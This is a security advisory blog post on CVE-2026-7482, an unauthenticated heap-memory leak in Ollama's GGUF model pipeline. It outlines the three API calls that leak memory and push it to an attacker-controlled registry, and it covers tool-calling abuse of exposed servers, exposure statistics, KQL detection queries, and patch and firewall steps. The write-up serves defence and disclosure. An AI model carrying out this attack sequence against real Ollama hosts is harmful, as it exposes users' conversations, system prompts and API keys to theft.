Skip to main content

Command Palette

Search for a command to run...

Bleeding Llama — CVE-2026-7482: When 300,000 AI Servers Become Targets

Updated
11 min read
Bleeding Llama — CVE-2026-7482: When 300,000 AI Servers Become Targets

Risk Summary

CVE-2026-7482 (CVSS 9.1 — Critical) allows an attacker to read heap memory directly from a running Ollama process without any credentials. Using just three API calls, all sensitive data currently resident in RAM — cloud API keys, organizational system prompts, and full user conversation history — can be exfiltrated to an attacker-controlled server.

Ollama has over 170,000 GitHub stars and more than 100 million Docker Hub pulls, and is widely deployed as a self-hosted AI inference engine in enterprise environments and by individual developers. What makes this vulnerability particularly dangerous: Ollama starts with no authentication by default and listens on all network interfaces (0.0.0.0:11434) — meaning anyone who can reach that port can exploit it immediately.

Research by SentinelLABS and Censys identified over 175,000 publicly exposed Ollama hosts across 130 countries. Cyera Research — the team that discovered the vulnerability — estimates approximately 300,000 servers were affected at the time of disclosure.

Immediate action required: Upgrade Ollama to version 0.17.1 or later, and block port 11434 from the public internet using firewall rules or network policies.


Technical Background

Attribute Details
CVE ID CVE-2026-7482
CVSS Score 9.1 — CRITICAL
CWE CWE-125 (Out-of-Bounds Read)
Affected Product Ollama — all versions prior to 0.17.1
Attack Vector Network, Unauthenticated, No User Interaction
Discovered By Cyera Research
Disclosed May 2026
Patch Ollama v0.17.1

Ollama uses the GGUF (GGML Unified Format) to store and load model weights. When a user uploads a GGUF file and requests Ollama to create a model from it, the engine reads tensor data from memory based on declarations in the file header — this is the root cause of the vulnerability.


Exploitation Mechanism

Root Cause: Out-of-Bounds Heap Read in GGUF Pipeline

The vulnerability resides in Ollama's model quantization pipeline. When processing a GGUF file, Ollama fully trusts the tensor shape values declared in the file header and reads exactly that many bytes from the memory buffer. A specially crafted GGUF file can declare a tensor size far larger than the actual data provided, causing Ollama to read beyond the intended buffer boundary — accessing adjacent heap memory containing sensitive process data.

That heap data is then embedded into the resulting model file. The attacker then leverages Ollama's built-in model push feature to send the file — along with all stolen heap data — to an attacker-controlled server.

Attack Flow: 3 API Calls, 0 Credentials

Step 1: Upload malicious GGUF file
POST /api/blobs/sha256:<hash>
Content: GGUF file with inflated tensor shape
→ Ollama stores the file in blob storage
 
Step 2: Trigger model creation (triggers out-of-bounds read)
POST /api/create
Body: {"name": "attacker-model", "modelfile": "FROM sha256:<hash>"}
→ Pipeline reads beyond buffer boundary; heap data is embedded into model file
 
Step 3: Exfiltrate model (containing heap data) externally
POST /api/push
Body: {"name": "attacker-registry/attacker-model"}
→ Entire model file — including stolen heap data — is pushed to attacker's server

The entire process requires no credentials, no user interaction, and can be executed remotely over the internet against any Ollama instance listening on a public interface.


Attack Surface: 175,000 Hosts, 130 Countries

Top 10 Countries by share of unique Ollama hosts - SentinelLABS research chart

Source: SentinelLABS + Censys — "Silent Brothers" Research (01/2026)

A joint research project between SentinelLABS and Censys, spanning 293 days, recorded 7.23 million observations across 175,108 unique Ollama hosts in 130 countries and 4,032 ASNs. These are not theoretical statistics — this is attack surface that is reachable right now.

The ecosystem has a bimodal structure: a large layer of transient hosts overlaying a smaller but persistent backbone that accounts for 76% of all observations. This backbone is where the most valuable targets reside — endpoints that run continuously, serve real utility to their operators, and represent the most attractive targets for adversaries.

Infrastructure breakdown:

  • 56% of hosts sit on fixed-access telecom/residential networks (consumer ISPs)

  • 32% on hyperscalers (AWS, GCP, Azure)

  • 19% of ASN classifications returned null values — ownership cannot be determined

Capability Surface: Beyond Text Generation

Host capability coverage breakdown - tool calling vision thinking models

Source: SentinelLABS — Host capability coverage (share of all hosts)

The picture is more alarming than exposed Ollama servers alone:

  • 48% of hosts have tool-calling capabilities — they can execute code, call external APIs, interact with file systems

  • 38% are configured with [completion, tools] — wired to interface with external software

  • 26% run "thinking" models (chain-of-thought, multi-step reasoning)

  • 22% support vision, creating vectors for indirect prompt injection via images or documents

  • 201 hosts are actively running "uncensored" system prompt templates that explicitly remove safety guardrails

Monoculture Risk

Top 20 model families by share of unique Ollama hosts

Source: SentinelLABS — Model adoption distribution

While host placement is decentralized, model adoption is highly concentrated. Llama (#1), Qwen2 (#2), and Gemma2 (#3) held the same top-3 positions with zero rank volatility across the entire 293-day scan period. The Q4_K_M quantization format appears on 48% of hosts — a vulnerability in how this specific format is processed could simultaneously affect nearly half the entire deployed ecosystem.


What Attackers Can Steal

The data recovered from heap memory is not random — it is operational data from the active Ollama process:

From active AI sessions:

  • User prompts and chat messages from all connected users

  • System prompts of all running models (often containing sensitive business logic, persona definitions, or internal tooling instructions)

  • Cross-session conversation history From the host environment:

  • Environment variables — including API keys for OpenAI, Anthropic, AWS, and database credentials

  • Source code submitted to the AI for review or debugging

  • Customer data, contracts, and internal documents pasted into AI sessions Highest-risk target: Enterprises using Ollama as a shared internal AI assistant — a single successful exploitation can yield interactions from the entire organization's workforce.


MITRE ATT&CK Mapping

Tactic Technique Description
Initial Access T1190 — Exploit Public-Facing Application Exploiting unauthenticated Ollama API endpoint
Credential Access T1552.001 — Credentials In Files / Env Vars Reading environment variables from heap memory
Collection T1005 — Data from Local System Collecting conversation history and system prompts from process memory
Exfiltration T1041 — Exfiltration Over C2 Channel Pushing model (containing stolen heap data) to attacker-controlled registry
Execution (tool-calling abuse) T1059 — Command and Scripting Interpreter Using exposed Ollama's tool-calling capability to execute commands

Detection & Response

No specific file hashes or attacker IPs have been published at the time of writing. However, behavior-based detection is fully viable:

KQL — Microsoft Sentinel (detecting push to external registry):

// Detect Ollama pushing models outside internal network
DeviceNetworkEvents
| where InitiatingProcessFileName =~ "ollama"
| where RemotePort in (443, 80, 11434)
| where not(RemoteIP has_any ("10.", "172.16.", "192.168.", "127."))
| where ActionType == "ConnectionSuccess"
| summarize count(), make_set(RemoteIP) by DeviceName, bin(Timestamp, 1h)
| where count_ > 5
| project Timestamp, DeviceName, RemoteIPs = set_RemoteIP, ConnectionCount = count_
// Detect abnormal inbound blob upload activity
DeviceNetworkEvents
| where InitiatingProcessFileName =~ "ollama"
| where RemotePort == 11434
| where ActionType == "InboundConnectionAccepted"
| where RemoteIP !has "127.0.0.1"
| summarize InboundCount = count() by DeviceName, bin(Timestamp, 10m)
| where InboundCount > 10

Quick Exposure Check:

# Check which interface Ollama is binding to
ss -tlnp | grep 11434
 
# If output contains 0.0.0.0:11434 → exposed on all interfaces, action needed
# If output contains 127.0.0.1:11434 → localhost only, safe
 
# Check current version
ollama --version
 
# Test external accessibility (from another host on the network)
curl -s http://<ollama-host>:11434/api/tags | jq .
# If it returns a model list without auth prompt → needs immediate remediation

Expert Analysis

CVE-2026-7482 draws a direct parallel to Heartbleed (CVE-2014-0160) — same vulnerability class: out-of-bounds heap read; same outcome: secret exfiltration from a running process's memory. Heartbleed exploited a buffer overread in OpenSSL's heartbeat extension to read 64KB of memory per request. Bleeding Llama exploits inflated tensor shapes in the GGUF pipeline to read the necessary heap region. Same pattern, different target: this time it's AI infrastructure.

The more concerning difference is monitoring coverage. In 2014, OpenSSL ran on infrastructure that already had security tooling, network monitoring, and patch management processes. Ollama in 2026 is different — the majority of deployments originate from developer or AI team initiatives, without security review, without EDR coverage on the Ollama process, and without anyone thinking to add firewall rules to a tool perceived as "internal only."

From a SOC perspective, three points stand out for organizations running Ollama:

Ollama is frequently deployed in dev/test environments without clear network segmentation — the AI server sitting on the same VLAN as production workloads or authentication infrastructure. Once Ollama is exploited and environment variables are dumped, lateral movement to the rest of the environment is a natural next step.

The tool-calling capability present on 48% of exposed hosts creates a secondary attack vector independent of the memory leak: an attacker doesn't need CVE-2026-7482 to execute commands. They can call into an exposed Ollama instance and instruct it to execute code through the tool-calling interface. This is LLM-as-execution-proxy — no exploit required.

The monoculture is a systemic risk. When Q4_K_M appears on 48% of hosts and Llama holds a stable #1 position, the next vulnerability in this format or model family will have a blast radius covering nearly half the entire deployed ecosystem — not isolated incidents, but sector-wide simultaneous impact.

CVSS 9.1 accurately reflects the technical severity. The business risk is even higher in environments using Ollama as a shared AI assistant — the entire organization's interaction history, system prompts containing business logic, and API keys for downstream services are all within reach of an attacker executing exactly three HTTP requests.


Recommendations

Immediate (0–24h)

# 1. Patch — upgrade Ollama to v0.17.1+
# Linux/macOS
curl -fsSL https://ollama.com/install.sh | sh
 
# Verify version after update
ollama --version  # must be 0.17.1 or higher
 
# 2. Block port 11434 at firewall if immediate patching is not possible
# Linux (iptables)
iptables -I INPUT -p tcp --dport 11434 -j DROP
iptables -I INPUT -s 127.0.0.1 -p tcp --dport 11434 -j ACCEPT
 
# Windows Firewall
netsh advfirewall firewall add rule name="Block Ollama External" `
  dir=in action=block protocol=TCP localport=11434

If Ollama needs to be accessible from the internal network (not just localhost), a reverse proxy with authentication is mandatory (nginx + basic auth or OAuth2 proxy) before any exposure — even on internal networks.

Short-term (1–7 days)

  • Audit all Ollama deployments: run ss -tlnp | grep 11434 on every host in inventory — identify which hosts are binding to 0.0.0.0

  • Implement network policies blocking outbound connections from the Ollama process to external IPs (prevents exfiltration via api/push)

  • Enable API access logging for Ollama: monitor POST /api/push, POST /api/blobs, POST /api/create from non-whitelisted IPs

  • Rotate all API keys, tokens, and secrets that were ever present in environment variables on any exposed Ollama host Long-term

  • Include Ollama in Asset Management and Vulnerability Management scope — most teams currently treat it as a "developer tool" outside IT security governance

  • Consider deploying an AI Gateway layer (LiteLLM, Open WebUI with auth enabled) rather than exposing the Ollama API directly

  • Establish clear network segmentation: AI inference servers should not share a VLAN with production workloads or authentication infrastructure


References

  1. Cyera Research — Bleeding Llama Advisory

  2. Cyera Blog — Bleeding Llama Deep Dive

  3. The Hacker News — CVE-2026-7482 Coverage

  4. SentinelLABS — Silent Brothers Research

  5. The Hacker News — 175K Exposed Ollama Servers

  6. CVE Record — CVE-2026-7482

  7. Ollama Release Notes v0.17.1

More from this blog

F

FPT IS Security

808 posts

Dedicated to providing insightful articles on cybersecurity threat intelligence, aimed at empowering individuals and organizations to navigate the digital landscape safely.